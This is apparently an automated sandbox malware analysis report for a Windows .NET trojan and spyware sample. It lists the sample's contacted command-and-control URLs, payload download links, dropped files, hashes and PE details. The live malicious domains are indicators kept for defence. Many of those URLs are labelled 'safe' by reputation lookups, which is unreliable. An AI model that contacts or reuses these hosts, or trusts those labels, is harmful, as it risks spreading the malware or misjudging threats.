                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://imztinoz.pw/TM/v.txt0%Avira URL Cloudsafe
                http://www.founder.com.cn/cns0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn_0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                http://www.fontbureau.comgrito0%URL Reputationsafe
                http://www.fontbureau.comgrito0%URL Reputationsafe
                http://www.fontbureau.comgrito0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.founder.com.cn/cnw-0%Avira URL Cloudsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.imztinoz.pw/TM/TaskManager.exe0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/jp/Z0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/Z0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Z0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Z0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://www.imztinoz.pw/TM/15.batKFile0%Avira URL Cloudsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.galapagosdesign.com/W0%Avira URL Cloudsafe
                http://www.founder.com.c0%URL Reputationsafe
                http://www.founder.com.c0%URL Reputationsafe
                http://www.founder.com.c0%URL Reputationsafe
                http://www.carterandcone.comr0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                amrp.tw
                		35.247.234.230
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://amrp.tw/kayo/gate.phpfalse
                • 20%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fontbureau.com/designersGFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                  		high
                  http://www.carterandcone.comn-uFJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/?FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                      		high
                      http://www.ibsensoftware.com/FJbeidnZOF.exe, FJbeidnZOF.exe, 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.tiro.comFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                        		high
                        http://www.tiro.comFFJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.goodfont.co.krFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comFJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssFJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpfalse
                          		high
                          http://www.jiyu-kobo.co.jp/~FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.imztinoz.pw/TM/15.batFJbeidnZOF.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sajatypeworks.comFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn/cTheFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.comFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://imztinoz.pw/TM/v.txtFJbeidnZOF.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.founder.com.cn/cnsFJbeidnZOF.exe, 00000001.00000003.210756308.00000000055D9000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.freewebs.com/tonysfilesFJbeidnZOF.exefalse
                            		high
                            http://www.founder.com.cn/cn_FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/Y0FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comgritoFJbeidnZOF.exe, 00000001.00000003.236778250.00000000055C6000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/(FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.comFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.sandoll.co.krFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cnw-FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.urwpp.deDPleaseFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFJbeidnZOF.exe, 00000001.00000002.238650996.0000000002521000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sakkal.comFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.imztinoz.pw/TM/TaskManager.exeFJbeidnZOF.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/jp/ZFJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/ZFJbeidnZOF.exe, 00000001.00000003.215445328.00000000055D5000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.imztinoz.pw/TM/15.batKFileFJbeidnZOF.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/WFJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cFJbeidnZOF.exe, 00000001.00000003.210930152.00000000055E5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comrFJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tiro.comlicFJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/AFJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/jp/FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/BFJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/=FJbeidnZOF.exe, 00000001.00000003.215445328.00000000055D5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/FJbeidnZOF.exe, 00000001.00000003.211196074.00000000055CB000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/wFJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnFJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://imztinoz.pw/TM/v.txtShttp://www.imztinoz.pw/TM/TaskManager.exeFJbeidnZOF.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlFJbeidnZOF.exe, 00000001.00000003.219820600.00000000055F7000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/cabarga.htmlFJbeidnZOF.exe, 00000001.00000003.220215711.00000000055F7000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.220145165.00000000055F7000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/pFJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.tiro.comTFJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/lFJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/fFJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            35.247.234.230
                                            		amrp.twUnited States
                                            		15169GOOGLEUSfalse

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:399798
                                            Start date:29.04.2021
                                            Start time:09:17:34
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 8m 16s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:FJbeidnZOF.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:27
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@3/3@81/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 5.7% (good quality ratio 5.1%)
                                            • Quality average: 70.4%
                                            • Quality standard deviation: 33.5%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 48
                                            • Number of non-executed functions: 5
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Excluded IPs from analysis (whitelisted): 93.184.220.29, 104.43.139.144, 168.61.161.212, 92.122.145.220, 13.88.21.125, 104.42.151.234, 184.30.20.56, 20.50.102.62, 205.185.216.10, 205.185.216.42, 92.122.213.249, 92.122.213.247, 20.54.26.129
                                            • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            09:18:34API Interceptor78x Sleep call for process: FJbeidnZOF.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FJbeidnZOF.exe.log
                                            Process:C:\Users\user\Desktop\FJbeidnZOF.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1314
                                            Entropy (8bit):5.350128552078965
                                            Encrypted:false
                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                            Process:C:\Users\user\Desktop\FJbeidnZOF.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 1
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                            Process:C:\Users\user\Desktop\FJbeidnZOF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14766
                                            Entropy (8bit):0.6033607178908347
                                            Encrypted:false
                                            SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllb5:u
                                            MD5:ACB2CF019753BD97F39EAF340F19DDB0
                                            SHA1:AB0777D22170D696D19781B51F5C8F5670C9238D
                                            SHA-256:A5D9728EE9A220ECDBD8E56F368B49DCEF124B40B9E8CABEC7B76BB8A0C0736E
                                            SHA-512:C16AB53BEEF0F815E51961F6654BCA197DF6C446F1827951363EBB5A6EF3CF2E6CA78736DCA8532FF4C0FAE9288E7F6B4CE3B0809E475B07E52C20F098732CB9
                                            Malicious:false
                                            Reputation:low
                                            Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.343638699941567
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:FJbeidnZOF.exe
                                            File size:653824
                                            MD5:0b43c829af2eb773a3614b02ba5b8c5f
                                            SHA1:bc55a69ca1a72f9f0761112c05b3938aebad1c43
                                            SHA256:25b6f68e2bf505cfde67c533f5d12e869b30efe831fa82fd91c2c29f59fc77ac
                                            SHA512:b217e62b84ee1ff57bb71195a0758ead6821c3cd21b9d48b710cc0a972b2740001e87edeaa22dd10800446ec15733ef5fa51eb58f2ca6d3129b351d9d2c99402
                                            SSDEEP:12288:gcqJFeA7KVpZNpeISb8XyIz5d10KaEjv+y3ZEdNdY8S:r2F6zExbyyIf1Vjv+ysdpS
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b+.`................................. ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:c2aabbabb3b3aad2

                                            Static PE Info

                                            General

                                            Entrypoint:0x48f9fe
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x608A2B62 [Thu Apr 29 03:43:30 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
